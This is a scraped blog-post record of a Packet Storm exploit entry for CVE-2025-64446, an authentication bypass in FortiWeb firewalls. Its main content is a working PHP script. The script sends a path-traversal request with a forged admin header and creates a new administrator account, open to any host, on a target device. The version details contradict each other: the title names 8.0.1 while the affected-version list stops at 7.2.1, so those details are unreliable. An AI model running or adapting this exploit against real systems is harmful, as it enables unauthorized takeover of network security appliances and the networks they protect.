{“lastseen”:”2025-11-27T17:51:55″,”description”:”A critical authentication bypass vulnerability exists in FortiWeb web application firewalls that allows unauthenticated attackers to create administrative users via path traversal in the API endpoint. Version 8.0.1 is affected…”,”published”:”2025-11-27T00:00:00″,”modified”:”2025-11-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FortiWeb 8.0.1 Authentication Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:212155″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-64446″],”sourceData”:”=============================================================================================================================================\\n | # Title : FortiWeb 8.0.1 Authentication Bypass to Unauthorized User Creation |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.fortinet.com\/ |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] References : https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2025-64446 \\n \\n https:\/\/packetstorm.news\/files\/id\/211729\/\\n \\n https:\/\/fortiguard.fortinet.com\/psirt\/FG-IR-25-071\\n \\n [+] Summary\\n \\n A critical authentication bypass vulnerability exists in FortiWeb web application firewalls that allows unauthenticated attackers to create administrative users via path traversal in the API endpoint. \\n \\tThis vulnerability enables complete compromise of the FortiWeb management interface.\\n \\t\\n [+] Vulnerability Type: Authentication Bypass via Path Traversal \u2192 Unauthorized User Creation\\n \\n \u2022 Affected Versions: FortiWeb 7.2.1 and earlier, 7.0.6 and earlier, 6.4.2 and earlier, 6.3.7 and earlier\\n \u2022 Patched Version: 7.2.2, 7.0.7, 6.4.3, 6.3.8\\n \u2022 Attack Vector: Network\\n \u2022 Authentication: Not Required (Unauthenticated)\\n \u2022 CVSS Score: 9.8 (Critical)\\n \u2022 CWE: CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) \\u0026 CWE-862: Missing Authorization\\n \u2022 CVE: CVE-2025-64446\\n \\n [+] Technical Description\\n \\n The vulnerability exists in the FortiWeb API endpoint handling where improper path validation allows attackers to bypass authentication mechanisms. The flaw enables:\\n \\n 1. Path traversal to access privileged CGI endpoints\\n 2. Bypass of API authentication checks\\n 3. Unauthorized creation of administrative users\\n 4. Complete compromise of FortiWeb management\\n \\n [+] Usage: \\n \\n Usage: php poc.php fortigate.example.com:8443\\n \\n [+] POC :\\n \\n \\u003c?php\\n \/**\\n * CVE-2025-64446 Exploit – FortiWeb Authentication Bypass\\n * By: indoushka\\n *\/\\n \\n class FortiWebExploit {\\n private $colors;\\n \\n public function __construct() {\\n $this-\\u003ecolors = [\\n ‘RED’ =\\u003e \\”\\\\033[91m\\”,\\n ‘GREEN’ =\\u003e \\”\\\\033[92m\\”,\\n ‘YELLOW’ =\\u003e \\”\\\\033[93m\\”,\\n ‘BLUE’ =\\u003e \\”\\\\033[94m\\”,\\n ‘MAGENTA’ =\\u003e \\”\\\\033[95m\\”,\\n ‘CYAN’ =\\u003e \\”\\\\033[96m\\”,\\n ‘WHITE’ =\\u003e \\”\\\\033[97m\\”,\\n ‘BOLD’ =\\u003e \\”\\\\033[1m\\”,\\n ‘RESET’ =\\u003e \\”\\\\033[0m\\”\\n ];\\n }\\n \\n private function color($text, $color) {\\n return $this-\\u003ecolors[$color] . $text . $this-\\u003ecolors[‘RESET’];\\n }\\n \\n private function showBanner() {\\n $banner = $this-\\u003ecolor(\\”\\n \\n indoushka (*) FortiWeb Authentication Bypass Artifact Generator\\n \\n \\n \\”, ‘MAGENTA’) . \\n $this-\\u003ecolor(\\” CVEs: [CVE-2025-64446]\\\\n\\”, ‘RED’);\\n \\n echo $banner . \\”\\\\n\\”;\\n }\\n \\n private function generateUUID() {\\n return sprintf(‘%04x%04x’, mt_rand(0, 0xffff), mt_rand(0, 0xffff));\\n }\\n \\n public function execute($target) {\\n $this-\\u003eshowBanner();\\n \\n \/\/ Parse target host and port\\n $parts = explode(‘:’, $target);\\n if (count($parts) !== 2) {\\n echo $this-\\u003ecolor(\\”[-] Invalid format! Use \\u003chost:port\\u003e\\”, ‘RED’) . \\”\\\\n\\”;\\n exit(1);\\n }\\n \\n $host = $parts[0];\\n $port = (int)$parts[1];\\n $user = $this-\\u003egenerateUUID();\\n $password = $user;\\n \\n $rawPath = \\”\/api\/v2.0\/cmdb\/system\/admin%3f\/..\/..\/..\/..\/..\/cgi-bin\/fwbcgi\\”;\\n \\n $cgiinfoJson = [\\n \\”username\\” =\\u003e \\”admin\\”,\\n \\”profname\\” =\\u003e \\”prof_admin\\”,\\n \\”vdom\\” =\\u003e \\”root\\”,\\n \\”loginname\\” =\\u003e \\”admin\\”\\n ];\\n \\n $cgiinfoB64 = base64_encode(json_encode($cgiinfoJson));\\n \\n $headers = [\\n \\”CGIINFO: \\” . $cgiinfoB64,\\n \\”Content-Type: application\/x-www-form-urlencoded\\”,\\n ];\\n \\n $body = [\\n \\”data\\” =\\u003e [\\n \\”q_type\\” =\\u003e 1,\\n \\”name\\” =\\u003e $user,\\n \\”access-profile\\” =\\u003e \\”prof_admin\\”,\\n \\”access-profile_val\\” =\\u003e \\”0\\”,\\n \\”trusthostv4\\” =\\u003e \\”0.0.0.0\/0\\”,\\n \\”trusthostv6\\” =\\u003e \\”::\/0\\”,\\n \\”last-name\\” =\\u003e \\”\\”,\\n \\”first-name\\” =\\u003e \\”\\”,\\n \\”email-address\\” =\\u003e \\”\\”,\\n \\”phone-number\\” =\\u003e \\”\\”,\\n \\”mobile-number\\” =\\u003e \\”\\”,\\n \\”hidden\\” =\\u003e 0,\\n \\”comments\\” =\\u003e \\”\\”,\\n \\”sz_dashboard\\” =\\u003e -1,\\n \\”type\\” =\\u003e \\”local-user\\”,\\n \\”type_val\\” =\\u003e \\”0\\”,\\n \\”admin-usergrp_val\\” =\\u003e \\”0\\”,\\n \\”wildcard_val\\” =\\u003e \\”0\\”,\\n \\”accprofile-override_val\\” =\\u003e \\”0\\”,\\n \\”sshkey\\” =\\u003e \\”\\”,\\n \\”passwd-set-time\\” =\\u003e 0,\\n \\”history-password-pos\\” =\\u003e 0,\\n \\”history-password0\\” =\\u003e \\”\\”,\\n \\”history-password1\\” =\\u003e \\”\\”,\\n \\”history-password2\\” =\\u003e \\”\\”,\\n \\”history-password3\\” =\\u003e \\”\\”,\\n \\”history-password4\\” =\\u003e \\”\\”,\\n \\”history-password5\\” =\\u003e \\”\\”,\\n \\”history-password6\\” =\\u003e \\”\\”,\\n \\”history-password7\\” =\\u003e \\”\\”,\\n \\”history-password8\\” =\\u003e \\”\\”,\\n \\”history-password9\\” =\\u003e \\”\\”,\\n \\”force-password-change\\” =\\u003e \\”disable\\”,\\n \\”force-password-change_val\\” =\\u003e \\”0\\”,\\n \\”password\\” =\\u003e $password\\n ]\\n ];\\n \\n $bodyData = json_encode($body);\\n \\n echo $this-\\u003ecolor(\\”[~] Sending exploit payload to $host:$port …\\”, ‘BLUE’) . \\”\\\\n\\”;\\n \\n \/\/ Create SSL context to disable verification\\n $context = stream_context_create([\\n ‘ssl’ =\\u003e [\\n ‘verify_peer’ =\\u003e false,\\n ‘verify_peer_name’ =\\u003e false,\\n ‘allow_self_signed’ =\\u003e true\\n ],\\n ‘http’ =\\u003e [\\n ‘method’ =\\u003e ‘POST’,\\n ‘header’ =\\u003e implode(\\”\\\\r\\\\n\\”, $headers) . \\”\\\\r\\\\n\\”,\\n ‘content’ =\\u003e $bodyData,\\n ‘ignore_errors’ =\\u003e true\\n ]\\n ]);\\n \\n $url = \\”https:\/\/$host:$port$rawPath\\”;\\n \\n \/\/ Send the request\\n $response = @file_get_contents($url, false, $context);\\n \\n if ($response === false) {\\n echo $this-\\u003ecolor(\\”[\u2717] Exploit failed – Could not connect to target\\”, ‘RED’) . \\”\\\\n\\”;\\n exit(1);\\n }\\n \\n \/\/ Get HTTP status code from response headers\\n $statusCode = 0;\\n if (isset($http_response_header[0])) {\\n preg_match(‘\/HTTP\\\\\/\\\\d\\\\.\\\\d\\\\s+(\\\\d+)\/’, $http_response_header[0], $matches);\\n $statusCode = isset($matches[1]) ? (int)$matches[1] : 0;\\n }\\n \\n \/\/ Process result\\n if ($statusCode === 200) {\\n echo $this-\\u003ecolor(\\”[\u2713] Exploit sent successfully!\\”, ‘GREEN’) . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(\\”[*] New user created \u2192 \\”, ‘YELLOW’) . $this-\\u003ecolor($user, ‘GREEN’) . \\”\\\\n\\”;\\n echo $this-\\u003ecolor(\\”[*] Password \u2192 \\”, ‘YELLOW’) . $this-\\u003ecolor($password, ‘GREEN’) . \\”\\\\n\\”;\\n } else {\\n echo $this-\\u003ecolor(\\”[\u2717] Exploit failed \u2014 Status Code: $statusCode\\”, ‘RED’) . \\”\\\\n\\”;\\n \\n \/\/ Debug information\\n if (!empty($http_response_header)) {\\n echo $this-\\u003ecolor(\\”[*] Response headers:\\”, ‘YELLOW’) . \\”\\\\n\\”;\\n foreach ($http_response_header as $header) {\\n echo \\” $header\\\\n\\”;\\n }\\n }\\n \\n if (!empty($response)) {\\n echo $this-\\u003ecolor(\\”[*] Response body:\\”, ‘YELLOW’) . \\”\\\\n\\”;\\n echo substr($response, 0, 500) . \\”\\\\n\\”;\\n }\\n }\\n }\\n }\\n \\n \/\/ Main execution\\n if (php_sapi_name() === ‘cli’) {\\n if ($argc !== 2) {\\n echo \\”Usage: php cve-2025-64446.php \\u003ctarget_fortiweb_ip:port\\u003e\\\\n\\”;\\n echo \\”Example: php cve-2025-64446.php 192.168.1.1:443\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new FortiWebExploit();\\n $exploit-\\u003eexecute($argv[1]);\\n } else {\\n echo \\”This script is intended for command line use only.\\\\n\\”;\\n }\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212155″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212155\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-27T17:51:55″,”description”:”A critical authentication bypass vulnerability exists in FortiWeb web application firewalls that allows unauthenticated attackers to create administrative users via path traversal in the API…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-27859","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n